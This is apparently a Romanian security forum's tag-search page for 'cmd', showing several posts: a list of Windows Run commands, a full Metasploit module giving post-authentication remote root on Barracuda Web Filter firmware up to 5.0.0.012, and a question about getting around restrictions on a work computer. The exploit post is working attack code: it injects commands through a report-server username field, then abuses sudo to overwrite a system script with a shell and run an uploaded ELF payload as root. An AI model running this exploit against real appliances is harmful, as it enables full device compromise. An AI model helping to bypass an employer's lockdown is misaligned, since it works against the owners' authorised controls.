Search the Community
Showing results for tags 'cmd'.
-
Cele mai utile comenzi de rulare din Windows 7 și 10. Aceste comenzi permit să accesați rapid caracteristici și aplicații pentru a particulariza mediul sistemului de operare. Quick Access To C: drive \ Open the current user’s home folder . Open up the Users folder .. Open Documents Folder documents Open Videos folder videos Open Downloads Folder downloads Open Favorites Folder favorites Open Recent Folder recent Open Recent Folder logoff Open Pictures Folder pictures Windows Sideshow control.exe /name Microsoft.WindowsSideshow Windows CardSpace control.exe /name Microsoft.cardspace Windows Anytime Upgrade WindowsAnytimeUpgradeui Taskbar and Start Menu control.exe /name Microsoft.TaskbarandStartMenu Troubleshooting control.exe /name Microsoft.Troubleshooting User Accounts control.exe /name Microsoft.UserAccounts Adding a new Device devicepairingwizard Add Hardware Wizard hdwwiz Advanced User Accounts netplwiz Advanced User Accounts azman.msc Backup and Restore sdclt Bluetooth File Transfer fsquirt Calculator calc Certificates certmgr.msc Change Computer Performance Settings systempropertiesperformance Change Data Execution Prevention Settings systempropertiesdataexecutionprevention Change Data Execution Prevention Settings printui Character Map charmap ClearType Tuner cttune Color Management colorcpl Command Prompt cmd Component Services comexp.msc Component Services dcomcnfg Computer Management compmgmt.msc Computer Management compmgmtlauncher Connect to a Network Projector netproj Connect to a Projector displayswitch Control Panel control Create A Shared Folder Wizard shrpubw Create a System Repair Disc recdisc Credential Backup and Restore Wizard credwiz Data Execution Prevention systempropertiesdataexecutionprevention Date and Time timedate.cpl Default Location locationnotifications Device Manager devmgmt.msc Device Manager hdwwiz.cpl Device Pairing Wizard devicepairingwizard Diagnostics Troubleshooting Wizard msdt Digitizer Calibration Tool tabcal DirectX Diagnostic Tool dxdiag Disk Cleanup cleanmgr Disk Defragmenter dfrgui Disk Management diskmgmt.msc Display dpiscaling Display Color Calibration dccw Display Switch displayswitch DPAPI Key Migration Wizard dpapimig Driver Verifier Manager verifier Ease of Access Center utilman EFS Wizard rekeywiz Event Viewer eventvwr.msc Fax Cover Page Editor fxscover File Signature Verification sigverif Font Viewer fontview Game Controllers joy.cpl Getting Started gettingstarted IExpress Wizard iexpress Getting Started irprops.cpl Install or Uninstall Display Languages lusrmgr Internet Explorer iexplore Internet Options inetcpl.cpl iSCSI Initiator Configuration Tool iscsicpl Language Pack Installer lpksetup Local Group Policy Editor gpedit.msc Local Security Policy secpol.msc Local Users and Groups lusrmgr.msc Location Activity locationnotifications Magnifier magnify Malicious Software Removal Tool mrt Manage Your File Encryption Certificates rekeywiz Math Input Panel mip Microsoft Management Console mmc Microsoft Support Diagnostic Tool msdt Mouse main.cpl NAP Client Configuration napclcfg.msc Narrator narrator Network Connections ncpa.cpl New Scan Wizard wiaacmgr Notepad notepad ODBC Data Source Administrator odbcad32 ODBC Driver Configuration odbcconf On-Screen Keyboard osk Paint mspaint Pen and Touch tabletpc.cpl People Near Me collab.cpl Performance Monitor perfmon.msc Performance Options systempropertiesperformance Phone and Modem telephon.cpl Phone Dialer dialer Power Options powercfg.cpl Presentation Settings presentationsettings Print Management printmanagement.msc Printer Migration printbrmui Printer User Interface printui Private Character Editor eudcedit Problem Steps Recorder psr Programs and Features appwiz.cpl Protected Content Migration dpapimig Region and Language intl.cpl Registry Editor regedit Registry Editor 32 regedt32 Remote Access Phonebook rasphone Remote Desktop Connection mstsc Resource Monitor resmon Resultant Set of Policy rsop.msc SAM Lock Tool syskey Screen Resolution desk.cpl Securing the Windows Account Database syskey Services services.msc Set Program Access and Computer Defaults computerdefaults Share Creation Wizard shrpubw Shared Folders fsmgmt.msc Snipping Tool snippingtool Sound mmsys.cpl Sound recorder soundrecorder SQL Server Client Network Utility cliconfg Sticky Notes stikynot Stored User Names and Passwords credwiz Sync Center mobsync System Configuration msconfig System Configuration Editor sysedit System Information msinfo32 System Properties sysdm.cpl System Properties (Advanced Tab) systempropertiesadvanced System Properties (Computer Name Tab) systempropertiescomputername System Properties (Hardware Tab) systempropertieshardware System Properties (Remote Tab) systempropertiesremote System Properties (System Protection Tab) systempropertiesprotection System Restore rstrui Task Manager taskmgr Task Scheduler taskschd.msc Trusted Platform Module (TPM) Management tpm.msc User Account Control Settings useraccountcontrolsettings Utility Manager utilman Version Reporter Applet winver Volume Mixer sndvol Windows Action Center wscui.cpl Windows Activation Client slui Windows Anytime Upgrade Results windowsanytimeupgraderesults Windows CardSpace infocardcpl.cpl Windows Disc Image Burning Tool isoburn Windows DVD Maker dvdmaker Windows Easy Transfer migwiz Windows Explorer explorer Windows Fax and Scan wfs Windows Features optionalfeatures Windows Firewall firewall.cpl Windows Firewall with Advanced Security wf.msc Windows Journal journal Windows Media Player wmplayer Windows Memory Diagnostic Scheduler mdsched Windows Mobility Center mblctr Windows Picture Acquisition Wizard wiaacmgr Windows PowerShell powershell Windows PowerShell ISE powershell_ise Windows Remote Assistance msra Windows Repair Disc recdisc Windows Script Host wscript Windows Update wuapp Windows Update Standalone Installer wusa Version Windows winver WMI Management wmimgmt.msc WordPad write XPS Viewer xpsrchvw Import to Windows Contacts wabmig Tablet PC Input Panel tabtip Windows Contacts wab Windows Firewall with Advanced Security wf Windows Help and Support winhlp32 Windows Script Host wscript WMI Tester wbemtest Access Screen Resolution page desk.cpl Access Mouse properties main.cpl Access Windows Action Center wscui.cpl Access Network Adapters ncpa.cpl Access Power Option powercfg.cpl Access the Programs and Features Window appwiz.cpl Access the System Properties sysdm.cpl Access the Windows Firewall firewall.cpl
-
Repo-ul e pe private for now.
-
# Exploit Title: Barracuda Firmware <= 5.0.0.012 Post Auth Remote Root exploit # Exploit Author: xort # Vendor Homepage: https://www.barracuda.com/ # Software Link: https://www.barracuda.com/products/webfilter # Version: Firmware <= 5.0.0.012 # Tested on: Vx and Hardware platforms # # Postauth remote root in Barracuda Firmware <= 5.0.0.012 for any under priviledged user with report generating # capablities. This exploit leverages a command injection bug along with poor sudo permissions to obtain # root. xort@blacksecurity.org require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root', 'Description' => %q{ This module exploits a remote command execution vulnerability in the Barracuda Firmware Version <= 5.0.0.012 by exploiting a vulnerability in the web administration interface. By sending a specially crafted request it's possible to inject system commands while escalating to root do to relaxed sudo configuration on the local machine. }, 'Author' => [ 'xort', # metasploit module ], 'Version' => '$Revision: 12345 $', 'References' => [ [ 'none', 'none'], ], 'Platform' => [ 'linux'], 'Privileged' => true, 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell' ], 'Privileged' => false, 'Payload' => { # note: meterpreter can't run on host do to kernel 2.4 incompatibilities + this is stable 'Compat' => { 'ConnectionType' => 'find', } }, 'Targets' => [ ['Linux Universal', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 0)) register_options( [ OptString.new('PASSWORD', [ false, 'Device password', "" ]), OptString.new('ET', [ false, 'Device password', "" ]), OptString.new('USERNAME', [ true, 'Device password', "admin" ]), OptString.new('CMD', [ false, 'Command to execute', "" ]), Opt::RPORT(8000), ], self.class) end def do_login(username, password, et) vprint_status( "Logging into machine with credentials...\n" ) # timeout timeout = 1550; # params password_clear = "admin" real_user = ""; login_state = "out" enc_key = Rex::Text.rand_text_hex(32) et = "1358817515" locale = "en_US" user = username password = Digest::MD5.hexdigest(username+enc_key) enctype = "MD5" password_entry = "" vprint_status( "Starting first routine...\n" ) data = "real_user=#{real_user}&login_state=#{login_state}&enc_key=#{enc_key}&et=#{et}&locale=#{locale}&user=#{user}&password=#{password}&enctype=#{enctype}&password_entry=#{password_entry}&password_clear=#{password_clear}&Submit=Login" vprint_status( "#{data}\n" ) res = send_request_cgi( { 'method' => 'POST', 'uri' => "/cgi-mod/index.cgi", 'cookie' => "", 'data' => data }, timeout) vprint_status( "login got code: #{res.code} ... continuing to second request..." ) File.open("/tmp/output2", 'w+') {|f| f.write(res.body) } # get rid of first yank password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0] vprint_status( "password got back = #{password} - et got back = #{et}\n" ) return password, et end def run_command(username, password, et, cmd) vprint_status( "Running Command...\n" ) exploitreq = [ [ "primary_tab", "BASIC" ], [ "secondary_tab","reports" ], [ "realm","" ], [ "auth_type","Local" ], [ "user", username ], [ "password", password ], [ "et",et ], [ "role","" ], [ "locale","en_US" ], [ "q","" ], [ "UPDATE_new_report_time_frame","custom" ], [ "report_start","2013-01-25 01:14" ], [ "report_end","2013-01-25 02:14" ], [ "type","" ], [ "ntlm_server","" ], [ "kerb_server","" ], [ "local_group","changeme" ], [ "ip_group","20.20.108.0/0.0.0.0" ], [ "ip_address__0","" ], [ "ip_address__1","" ], [ "ip_address__2","" ], [ "ip_address__3","" ], [ "netmask__0","" ], [ "netmask__1","" ], [ "netmask__2","" ], [ "netmask__3","" ], [ "UPDATE_new_report_pattern_values","" ], [ "UPDATE_new_report_pattern_text","" ], [ "UPDATE_new_report_filter_destination","domain" ], [ "filter_domain","" ], [ "UPDATE_new_report_filter_domain","" ], [ "UPDATE_new_report_filter_category","" ], [ "UPDATE_new_report_exclude_from","" ], [ "UPDATE_new_report_exclude_to","" ], [ "UPDATE_new_report_exclude_days","" ], [ "allow","allow" ], [ "block","block" ], [ "warn","warn" ], [ "monitor","monitor" ], [ "UPDATE_new_report_filter_actions","allow,block,warn,monitor" ], [ "UPDATE_new_report_filter_count","10" ], [ "UPDATE_new_report_chart_type","vbar" ], [ "UPDATE_new_report_format","html" ], [ "DEFAULT_new_report_group_expand","No" ], [ "UPDATE_new_report_expand_user_count","5" ], [ "UPDATE_new_report_expand_domain_count","5" ], [ "UPDATE_new_report_expand_cat_count","5" ], [ "UPDATE_new_report_expand_url_count","5" ], [ "UPDATE_new_report_expand_threat_count","5" ], [ "report","on" ], [ "UPDATE_new_report_name", Rex::Text.rand_text_alphanumeric(10) ], [ "UPDATE_new_report_id","" ], [ "UPDATE_new_report_enabled","Yes" ], [ "secondary_scope","report" ], [ "secondary_scope_data","" ], [ "UPDATE_new_report_reports","sessions_by_user,infection_activity" ], [ "UPDATE_new_report_delivery","external" ], [ "UPDATE_new_report_delivery_dest_email","" ], [ "UPDATE_new_report_server","new" ], [ "UPDATE_new_external_server_type","smb" ], [ "UPDATE_new_external_server_alias", Rex::Text.rand_text_alphanumeric(10) ], [ "UPDATE_new_external_server","4.4.4.4" ], [ "UPDATE_new_external_server_port","445" ], [ "UPDATE_new_external_server_username","\"` #{cmd} `\"" ], [ "UPDATE_new_external_server_password","asdf" ], [ "UPDATE_new_external_server_path","/"+ Rex::Text.rand_text_alphanumeric(15) ], [ "UPDATE_new_report_frequency", "once" ], [ "UPDATE_new_report_split", "no" ], [ "add_report_id","Apply" ], [ "remover","" ] ] data = Rex::MIME::Message.new data.bound = "---------------------------" + Rex::Text.rand_text_numeric(30) exploitreq.each do |xreq| data.add_part(xreq[1], nil, nil, "form-data; name=\"" + xreq[0] + "\"") end post_data = data.to_s post_data = post_data.gsub(/\r\n---------------------------/, "---------------------------") datastore['UserAgent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0" vprint_status( "sending..." ) res = send_request_cgi({ 'method' => 'POST', 'uri' => "/cgi-mod/index.cgi", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'headers' => { 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 'Accept-Language' => "en-US,en;q=0.5" } }) if res.code == 200 vprint_status( "You can now reuse the login params you were supplied to avoid the lengthy wait at the exploits initial launch.... \n" ) vprint_status( "password: #{password} et: #{et}\n" ) end vprint_status( "login got code: #{res.code} from report_results.cgi\n" ) File.open("/tmp/output4", 'w+') {|f| f.write(res.body) } end def run_script(username, password, et, cmds) vprint_status( "running script...\n") end def exploit # timeout timeout = 1550; user = "admin" # params real_user = ""; login_state = "out" et = "1358817515" #epoch time locale = "en_US" user = "admin" password = "" enctype = "MD5" password_entry = "" password_clear = "admin" vprint_status("<- Encoding payload to elf string...") elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\x\1\2') # extra escaping to get passed down correctly if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty? password_clear = "admin" password = datastore['PASSWORD'] et = datastore['ET'] # else - if no 'CMD' string - add code for root shell else password, et = do_login(user, password, et) vprint_status("new password: #{password}\n") end sleep(5) if not datastore['CMD'].nil? and not datastore['CMD'].empty? cmd = datastore['CMD'] end run_command(user, password, et, cmd) # create elf in /tmp, abuse sudo to overwrite another command we have sudo access to (static routes scripts), then execute with sudo perm cmd = "echo -ne #{encoded_elf} > /tmp/x ;" cmd += "chmod +x /tmp/x ;" # backup static_routes file cmd += "cp -f /home/product/code/config/static_routes /tmp/zzz" cmd += "sudo cp -f /bin/sh /home/product/code/config/static_routes" # execute elf as root cmd += "sudo /home/product/code/config/static_routes -c /tmp/x ;" # restore static_routes file cmd += "cp -f /tmp/zzz /home/product/code/config/static_routes" run_command(user, password, et, cmd) sleep(2) handler sleep(5) end end Source: http://packetstorm.wowhacker.com/1504-exploits/barracuda_5x_reports_postauth_root_exploit.rb.txt
-
Salutare. Ideea este in felul urmator: vreau sa opresc un program sa porneasca odata cu windows-ul (w7). Calculatorul este cel de la servici si are cam toate functiile oprite, singura care merge este cmd. Am incercat din cmd sa sterg registrul respectiv, dar nu imi da voie... Aveti vreo idee?